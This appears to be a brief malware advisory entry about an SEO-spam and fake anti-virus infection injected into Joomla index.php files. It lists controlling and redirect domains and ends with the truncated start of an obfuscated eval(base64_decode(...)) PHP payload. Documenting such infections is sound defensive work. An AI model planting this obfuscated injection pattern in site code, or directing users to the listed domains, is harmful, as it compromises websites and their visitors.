Description Malware used on a large scale SEO SPAM work
controlled by these domains:
http://gberbhjerfds.osa.pl
http://newwave.orge.pl
http://p3p0.com
Fake AV: When it detects that a user is using Windows, it will
redirect them to:
http://www3.virus-searching49.co.cc
And other domains to try to push the fake anti-virus.
Affecting: Joomla sites. Malicious code is added to the index.php
file.
Malware dump:
eval (base64_decode("aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiZ29